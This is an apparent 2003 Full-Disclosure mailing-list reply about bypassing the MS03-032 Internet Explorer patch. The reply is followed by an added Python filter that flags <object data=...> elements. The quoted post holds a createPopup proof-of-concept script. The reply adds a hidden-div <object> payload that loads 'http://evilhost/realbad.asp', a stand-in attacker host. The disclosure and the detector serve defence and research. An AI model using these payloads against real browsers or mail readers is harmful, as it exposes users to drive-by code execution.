
From: morning_wood <se_cur_ity_(at)_hotmail.com>
Date: 08.09.2003
Subject: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


----- Original Message -----
From: "http-equiv@excite.com" <1@malware.com>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


>
>
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
>   var oPopup = window.createPopup();
>
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>

this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp">
</object>oh</div>

beware the mail...
                           and the rewtXSS skillz


Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
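
Both snippets in this thread put an `<object>` element with a `data` attribute in front of the browser, once as plain markup and once as a string a script assigns to `innerHTML`. The following is an added example, not part of either post: a content-filter check that reports both forms in an HTML page or mail body. The names `ObjectDataFinder` and `find_object_data`, and the sample input, are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# <object ... data=...> written inside script text, e.g. an innerHTML string.
# Tolerates unquoted, quoted and backslash-escaped-quote attribute values.
OBJECT_IN_SCRIPT = re.compile(
    r"<object\b[^>]*?\bdata\s*=\s*\\?[\"']?([^\s\"'>\\]+)", re.IGNORECASE)


class ObjectDataFinder(HTMLParser):
    """Collects every <object data=...> found in markup or in script text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []          # (where, data_value, line_number)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            data = dict(attrs).get("data")
            if data:
                self.findings.append(("markup", data, self.getpos()[0]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, text):
        if not self._in_script:
            return
        for m in OBJECT_IN_SCRIPT.finditer(text):
            line = self.getpos()[0] + text.count("\n", 0, m.start())
            self.findings.append(("script", m.group(1), line))


def find_object_data(html):
    """Return a list of (where, data_value, line_number) findings."""
    finder = ObjectDataFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample input covering both forms discussed in the thread.
SAMPLE = '''<div><object data="http://host.example/page.asp"></object></div>
<script>
  popup.document.body.innerHTML = "<object data=sample.php>";
</script>'''
```

A filter built on this would quarantine or strip any message with a non-empty result, since the check keys on the element itself rather than on a particular file extension in the `data` value.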
